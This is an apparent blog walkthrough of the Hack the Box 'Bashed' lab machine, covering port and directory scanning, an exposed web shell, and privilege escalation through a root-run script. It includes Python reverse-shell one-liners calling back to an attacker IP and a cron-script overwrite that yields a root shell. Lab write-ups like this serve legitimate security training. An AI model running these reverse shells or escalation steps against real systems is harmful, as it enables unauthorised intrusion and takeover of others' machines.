Hack the Box - Bashed - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Bashed machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Bashed machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.98.229.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.98.229


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

nmap -T4 -p80 10.129.98.229


Seeing that we only have an Apache server port open on the target, we enumerate the web directories using Gobuster:

gobuster dir -u http://10.129.98.229/ -w /usr/share/wordlists/dirb/big.txt -x php,bak,txt,html -s 200,204,301,302,307,403,401



The /dev directory looks suspicious, so let's check it out in our web browser:

http://10.129.98.229/dev/


And let's take a look at phpbash.php:

http://10.129.98.229/dev/phpbash.php



It looks like this web app essentially gives us a web shell. Let's test it out by checking the host's version info:

uname -a


Capturing the User Flag

Because we essentially have an interactive web shell at this point, we can capture the system's User flag now. User flag files on Hack the Box Linux systems are usually located in a user's /home directory. In this case, it's in the /home/arrexel directory:

cat /home/arrexel/user.txt


Finding a Way In

I think we can definitely get a reverse shell connection through this web page, but let's check to see if Python is on the system for a potential method of getting our shell:

which python


This confirms we can use Python to open a reverse shell. Before we do that, we need to start our Netcat listener on our attacking system:

sudo nc -nlvp 443


And now to send the Python command through the webpage:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.99.99",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

whoami



Foothold Enumeration

Let's see what our user can do:

sudo -l


It looks like our user can switch to the scriptmanager user without supplying a password. Let's try that:

sudo -u scriptmanager /bin/bash
whoami
python -c ‘import pty; pty.spawn("/bin/bash")’


So we're the scriptmanager user now, and we've used python to upgrade our shell. Why do we want to be the scriptmanager user? Let's check which files this user owns.

find / -user scriptmanager -type f 2>/dev/null


Scripts. Scheduled job scripts are a classic privilege escalation technique, so let's check out that test.py file.

cat /scripts/test.py


The script creates the test.txt file, writes a string to it, then finishes. Let's take a look at the test.txt file:

ls -la /scripts


Privilege Escalation

One thing that sticks out about test.txt is that it was created by root. In addition, the file was created very recently. That leads us to conclude that the test.py script is being run very frequently, and is run as the root user. Since our current user owns the test.py script, we can modify the script to open a reverse shell back to our attacking system with Python commands.

Before we modify the test.py script, let's setup another Netcat listener on our attacking system to catch our root shell:

sudo nc -nlvp 80


And now to overwrite the contents of test.py with our reverse shell python script:

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.99.99",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > test.py


We wait a minute for the scheduled script to run, then:

whoami


Capturing the Root Flag

Root flags on Hack the Box Linux systems are usually in the /root directory, so let's capture it now:

cat /root/root.txt


Summary

After initial scans, we found that there was a web-app located on the target's web server which allowed command injection on the web host, which we utilized to obtain a foothold into the system. Once inside the target, we found that there was a frequently-run scheduled command running as the root user that was linked to a script file that our low-privileged user could edit. We edited the script file, which allowed us to open a root shell on the target and obtain the objective flag files.

Finish

Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more